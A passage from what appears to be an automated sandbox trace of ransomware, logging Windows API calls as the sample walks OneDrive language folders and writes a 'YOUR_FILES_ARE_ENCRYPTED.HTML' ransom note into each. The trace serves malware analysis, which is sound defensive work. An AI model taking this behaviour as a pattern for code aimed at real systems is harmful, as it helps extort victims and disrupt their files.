(lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.744] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\mt-mt\\FileSync.LocalizedResources.dll.mui") returned 117 [0113.744] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.744] lstrlenW (lpString=".mui") returned 4 [0113.744] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.744] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf0aabfbc, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xf0aabfbc, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xf0e3f813, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x15ec0, dwReserved0=0x19e010, dwReserved1=0x1ad96cd, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0113.744] FindClose (in: hFindFile=0x6267b8 | out: hFindFile=0x6267b8) returned 1 [0113.744] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\mt-mt\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 111 [0113.744] GetProcessHeap () returned 0x600000 [0113.744] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0113.744] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\mt-mt\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\mt-mt\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x330 [0113.745] WriteFile (in: hFile=0x330, lpBuffer=0x6d47c0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d47c0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0113.746] CloseHandle (hObject=0x330) returned 1 [0113.758] GetProcessHeap () returned 0x600000 [0113.758] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0113.758] GetProcessHeap () returned 0x600000 [0113.758] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30c81a0 | out: hHeap=0x600000) returned 1 [0113.760] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf0f70aa2, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xf0f70aa2, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xf0f70aa2, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="nb-no", cAlternateFileName="")) returned 1 [0113.760] StrStrIW (lpFirst="nb-no", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.760] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\nb-no") returned 81 [0113.760] GetProcessHeap () returned 0x600000 [0113.760] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0113.761] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\nb-no" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\nb-no") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\nb-no" [0113.761] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\nb-no", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\nb-no\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\nb-no\\*" [0113.761] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\nb-no\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf0f70aa2, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xf0f70aa2, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xf137687f, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x1ad96cd, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0113.761] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf0f70aa2, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xf0f70aa2, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xf137687f, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x1ad96cd, cFileName="..", cAlternateFileName="")) returned 1 [0113.761] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf137687f, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xf137687f, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xf16257fb, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x14cc0, dwReserved0=0x19e010, dwReserved1=0x1ad96cd, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0113.762] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.762] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\nb-no\\FileSync.LocalizedResources.dll.mui") returned 117 [0113.762] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.762] lstrlenW (lpString=".mui") returned 4 [0113.762] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.762] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf137687f, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xf137687f, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xf16257fb, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x14cc0, dwReserved0=0x19e010, dwReserved1=0x1ad96cd, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0113.762] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0113.762] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\nb-no\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 111 [0113.762] GetProcessHeap () returned 0x600000 [0113.762] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0113.762] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\nb-no\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\nb-no\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0113.763] WriteFile (in: hFile=0x334, lpBuffer=0x6d47c0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d47c0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0113.764] CloseHandle (hObject=0x334) returned 1 [0113.764] GetProcessHeap () returned 0x600000 [0113.764] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0113.764] GetProcessHeap () returned 0x600000 [0113.764] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0113.764] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf17c8cd3, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xf17c8cd3, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xf17c8cd3, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="ne-np", cAlternateFileName="")) returned 1 [0113.764] StrStrIW (lpFirst="ne-np", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.764] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ne-np") returned 81 [0113.764] GetProcessHeap () returned 0x600000 [0113.764] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0113.764] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ne-np" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ne-np") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ne-np" [0113.764] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ne-np", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ne-np\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ne-np\\*" [0113.764] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ne-np\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf17c8cd3, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xf17c8cd3, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xf1b36552, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x1ad96cd, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0113.765] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf17c8cd3, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xf17c8cd3, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xf1b36552, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x1ad96cd, cFileName="..", cAlternateFileName="")) returned 1 [0113.765] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf1b36552, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xf1b36552, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xf34924de, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x164c0, dwReserved0=0x19e010, dwReserved1=0x1ad96cd, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0113.765] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.765] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ne-np\\FileSync.LocalizedResources.dll.mui") returned 117 [0113.765] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.765] lstrlenW (lpString=".mui") returned 4 [0113.765] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.765] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf1b36552, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xf1b36552, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xf34924de, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x164c0, dwReserved0=0x19e010, dwReserved1=0x1ad96cd, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0113.765] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0113.765] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ne-np\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 111 [0113.765] GetProcessHeap () returned 0x600000 [0113.765] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0113.765] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ne-np\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\ne-np\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0113.766] WriteFile (in: hFile=0x334, lpBuffer=0x6d47c0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d47c0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0113.766] CloseHandle (hObject=0x334) returned 1 [0113.766] GetProcessHeap () returned 0x600000 [0113.766] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0113.766] GetProcessHeap () returned 0x600000 [0113.767] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0113.767] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf429021d, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xf429021d, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xf429021d, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="nl", cAlternateFileName="")) returned 1 [0113.767] StrStrIW (lpFirst="nl", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.767] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\nl") returned 78 [0113.767] GetProcessHeap () returned 0x600000 [0113.767] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0113.767] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\nl" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\nl") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\nl" [0113.767] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\nl", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\nl\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\nl\\*" [0113.767] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\nl\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf429021d, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xf429021d, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xf56df403, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x1ad96cd, cFileName=".", cAlternateFileName="")) returned 0x626978 [0113.767] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf429021d, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xf429021d, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xf56df403, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x1ad96cd, cFileName="..", cAlternateFileName="")) returned 1 [0113.767] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf56df403, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xf56df403, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xf5b318da, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x164c0, dwReserved0=0x19e010, dwReserved1=0x1ad96cd, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0113.767] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.767] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\nl\\FileSync.LocalizedResources.dll.mui") returned 114 [0113.767] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.767] lstrlenW (lpString=".mui") returned 4 [0113.767] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.767] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf56df403, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xf56df403, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xf5b318da, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x164c0, dwReserved0=0x19e010, dwReserved1=0x1ad96cd, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0113.767] FindClose (in: hFindFile=0x626978 | out: hFindFile=0x626978) returned 1 [0113.767] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\nl\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 108 [0113.767] GetProcessHeap () returned 0x600000 [0113.767] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0113.767] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\nl\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\nl\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0113.768] WriteFile (in: hFile=0x334, lpBuffer=0x6d47c0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d47c0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0113.769] CloseHandle (hObject=0x334) returned 1 [0113.769] GetProcessHeap () returned 0x600000 [0113.769] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0113.769] GetProcessHeap () returned 0x600000 [0113.769] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0113.769] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf5c88bd2, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xf5c88bd2, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xf5c88bd2, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="nn-no", cAlternateFileName="")) returned 1 [0113.770] StrStrIW (lpFirst="nn-no", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.770] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\nn-no") returned 81 [0113.770] GetProcessHeap () returned 0x600000 [0113.770] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0113.771] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\nn-no" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\nn-no") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\nn-no" [0113.771] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\nn-no", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\nn-no\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\nn-no\\*" [0113.771] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\nn-no\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf5c88bd2, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xf5c88bd2, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xf646e6b2, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x1ad96cd, cFileName=".", cAlternateFileName="")) returned 0x626978 [0113.772] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf5c88bd2, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xf5c88bd2, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xf646e6b2, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x1ad96cd, cFileName="..", cAlternateFileName="")) returned 1 [0113.772] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf646e6b2, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xf646e6b2, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xf98bc1f8, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x14cc0, dwReserved0=0x19e010, dwReserved1=0x1ad96cd, cFileName="FileSync.LocalizedResources.dll.mui", 